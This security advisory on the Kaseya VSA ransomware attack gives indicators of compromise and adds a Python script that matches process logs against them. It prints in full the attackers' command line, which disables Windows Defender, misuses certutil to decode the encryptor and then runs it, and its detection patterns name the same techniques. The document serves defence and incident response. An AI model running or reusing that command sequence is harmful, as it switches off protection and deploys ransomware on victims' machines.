GroupSense analysts became aware of a widespread attack leveraging Kaseya’s Vector Signal Analysis (VSA) platform, commonly used by Managed Service Providers (MSPs).
Kaseya’s VSA platform is a cloud-based IT management and remote monitoring solution for businesses of all sizes across various industries. It provides a central console for managing IT operations including handling complaints, ticketing, auditing, monitoring performance and reporting.
It is reported that only on-premise Kaseya VSA installations have been affected; the cloud instances are unaffected.
Kaseya is recommending that all users immediately shut down any VSA server until further notice from Kaseya. We strongly recommend following this guidance, as a number of MSPs are currently dealing with the crisis. We feel that the timing, at the start of a holiday weekend, indicates this is a preplanned attack by a sophisticated group and not a target of opportunity.
The Indicators of Compromise are:
- Notifications indicated that the "KElevated######" (SQL User) account performed this action.
- VSA admin user accounts are disabled only moments before the ransomware is deployed.
- The ransomware encryptor is dropped to c:\kworking\agent.exe.
- The VSA procedure is named "Kaseya VSA Agent Hot-fix".
- At least two tasks run the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The encryptor (agent.exe) is signed with a valid digital signature with the following information:
- Name: PB03 TRANSPORT LTD.
- Email: Brouillettebusiness@outlook.com
- CN = Sectigo RSA Code Signing CA, O = Sectigo Limited, L = Salford, S = Greater Manchester, C = GB
- Serial #: 119acead668bad57a48b4f42f294f8f0
- Issuer: https://sectigo.com/
When agent.exe runs, the following files are dropped into the hardcoded path c:\Windows:
- MsMpEng.exe - the legitimate Windows Defender executable
- mpsvc.dll - the encryptor payload, which is sideloaded by the legitimate Defender executable
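A defender-side check for the indicators listed above, added here as an example and not part of GroupSense's or Kaseya's tooling: it matches the task command line, the certutil copy/decode sequence and the c:\kworking\agent.exe path against process-creation records. The record format ("timestamp|user|cmdline") and the three sample records are constructed for the example.

```python
from __future__ import annotations
import re

# Indicators taken from the advisory above: (name, case-insensitive regex
# applied to a process command line).
IOC_PATTERNS = [
    ("defender_disabled_via_set_mppreference",
     r"set-mppreference\b.*-disablerealtimemonitoring\s+\$true"),
    ("ping_loopback_delay",
     r"ping\s+127\.0\.0\.1\s+-n\s+\d{3,}"),
    ("certutil_copied_to_cert_exe",
     r"copy\s+/y\s+\S*certutil\.exe\s+\S*\\cert\.exe"),
    ("cert_exe_decodes_agent_crt",
     r"cert(util)?\.exe\s+-decode\s+\S*kworking\\agent\.crt"),
    ("kworking_agent_exe",
     r"\\kworking\\agent\.exe"),
]

def match_iocs(cmdline: str) -> list[str]:
    """Return the names of every advisory indicator found in one command line."""
    return [name for name, pat in IOC_PATTERNS
            if re.search(pat, cmdline, re.IGNORECASE)]

def scan_log(records: list[str]) -> list[tuple[int, list[str]]]:
    """Scan 'timestamp|user|cmdline' records (constructed format); return (index, hits)."""
    findings = []
    for i, rec in enumerate(records):
        cmdline = rec.split("|", 2)[-1]
        hits = match_iocs(cmdline)
        if hits:
            findings.append((i, hits))
    return findings

# Constructed sample records (not real telemetry). The first reproduces the
# task command line from the advisory; the other two are benign look-alikes.
SAMPLE_LOG = [
    "2021-07-02T14:01:03|NT AUTHORITY\\SYSTEM|"
    "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ping 127.0.0.1 -n 4979 > nul & "
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference "
    "-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -Force & "
    "copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & "
    "echo %RANDOM% >> C:\\Windows\\cert.exe & "
    "C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & "
    "del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe",
    "2021-07-02T14:02:10|CORP\\admin|C:\\Windows\\System32\\ping.exe 10.0.0.5 -n 4",
    "2021-07-02T14:03:44|CORP\\admin|powershell.exe Get-MpPreference",
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG):
        print(f"record {idx}: {', '.join(hits)}")
```

A single hit such as the ping delay is weak on its own; the co-occurrence of the Defender-disabling, certutil-decode and agent.exe indicators in one command line is what makes the first record an actionable alert.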
GroupSense recommends that clients using Kaseya VSA follow the current guidance in Kaseya's official recommendation: "IMMEDIATELY shutdown your VSA server until you receive further notice from [Kaseya]."